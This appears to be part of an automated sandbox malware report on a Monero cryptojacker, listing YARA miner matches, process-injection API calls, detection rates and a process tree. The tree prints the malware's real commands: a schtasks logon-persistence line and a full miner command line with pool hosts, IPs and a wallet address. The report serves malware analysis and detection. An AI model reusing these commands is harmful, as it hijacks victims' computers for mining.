              Source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE; Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
              Source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 18.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 18.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, type: MEMORY; Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
              Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 0000000F.00000003.719582086.000002A79BBD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000009.00000003.709450089.000002C968F90000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000009.00000003.717098920.000002C968F90000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000009.00000003.708284013.000002C968F90000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
              Source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
              Source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: Process Memory Space: explorer.exe PID: 6784, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
              Source: Process Memory Space: explorer.exe PID: 6784, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: Process Memory Space: explorer.exe PID: 6764, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
              Source: Process Memory Space: explorer.exe PID: 6764, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: C:\Windows\System32\conhost.exe | Code function: 1_2_0000025F5EFFE106
              Source: C:\Windows\System32\conhost.exe | Code function: 1_2_0000025F5EFFE4D6
              Source: C:\Windows\System32\conhost.exe | Code function: 1_2_0000025F5EFFE90E
              Source: C:\Windows\System32\conhost.exe | Code function: 1_2_0000025F5EFFD4D2
              Source: C:\Windows\System32\conhost.exe | Code function: 1_2_0000025F5EFFED6A
              Source: C:\Windows\System32\conhost.exe | Code function: 1_2_00007FFA36125E22
              Source: C:\Windows\System32\conhost.exe | Code function: 1_2_00007FFA36125076
              Source: C:\Windows\System32\conhost.exe | Code function: 9_2_000002C94E2FE4D6
              Source: C:\Windows\System32\conhost.exe | Code function: 9_2_000002C94E2FE106
              Source: C:\Windows\System32\conhost.exe | Code function: 9_2_000002C94E2FE90E
              Source: C:\Windows\System32\conhost.exe | Code function: 9_2_000002C94E2FD4D2
              Source: C:\Windows\System32\conhost.exe | Code function: 9_2_000002C94E2FED6A
              Source: C:\Windows\System32\conhost.exe | Code function: 9_2_00007FFA36149B74
              Source: C:\Windows\System32\conhost.exe | Code function: 9_2_00007FFA361467BC
              Source: C:\Windows\System32\conhost.exe | Code function: 9_2_00007FFA36145E22
              Source: C:\Windows\System32\conhost.exe | Code function: 9_2_00007FFA36145076
              Source: C:\Windows\System32\conhost.exe | Code function: 9_2_00007FFA36144B79
              Source: C:\Windows\System32\conhost.exe | Code function: 15_2_000002A7810FE4D6
              Source: C:\Windows\System32\conhost.exe | Code function: 15_2_000002A7810FE106
              Source: C:\Windows\System32\conhost.exe | Code function: 15_2_000002A7810FE90E
              Source: C:\Windows\System32\conhost.exe | Code function: 15_2_000002A7810FD4D2
              Source: C:\Windows\System32\conhost.exe | Code function: 15_2_000002A7810FED6A
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe | Code function: 0_2_00401D58 NtAllocateVirtualMemory,
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe | Code function: 0_2_00401D18 NtWriteVirtualMemory,
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe | Code function: 0_2_004019D8 NtCreateThreadEx,
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe | Code function: 0_2_00401D98 NtProtectVirtualMemory,
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe | Code function: 0_2_00401C98 NtClose,
              Source: C:\Windows\System32\conhost.exe | Code function: 9_2_00007FFA3614A30E NtUnmapViewOfSection,
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Code function: 13_2_00401D58 NtAllocateVirtualMemory,
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Code function: 13_2_00401D18 NtWriteVirtualMemory,
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Code function: 13_2_004019D8 NtCreateThreadEx,
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Code function: 13_2_00401D98 NtProtectVirtualMemory,
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Code function: 13_2_00401C98 NtClose,
              Source: C:\Windows\System32\conhost.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
              Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
              Source: pcNCraWcRk.exe | Virustotal: Detection: 64%
              Source: pcNCraWcRk.exe | Metadefender: Detection: 31%
              Source: pcNCraWcRk.exe | ReversingLabs: Detection: 81%
              Source: pcNCraWcRk.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown | Process created: C:\Users\user\Desktop\pcNCraWcRk.exe 'C:\Users\user\Desktop\pcNCraWcRk.exe'
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe | Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe'
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
              Source: C:\Users\user\AppData\Local\Temp\services64.exe | Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe'
              Source: C:\Users\user\AppData\Local\Temp\services64.exe | Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' '/sihost64'
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
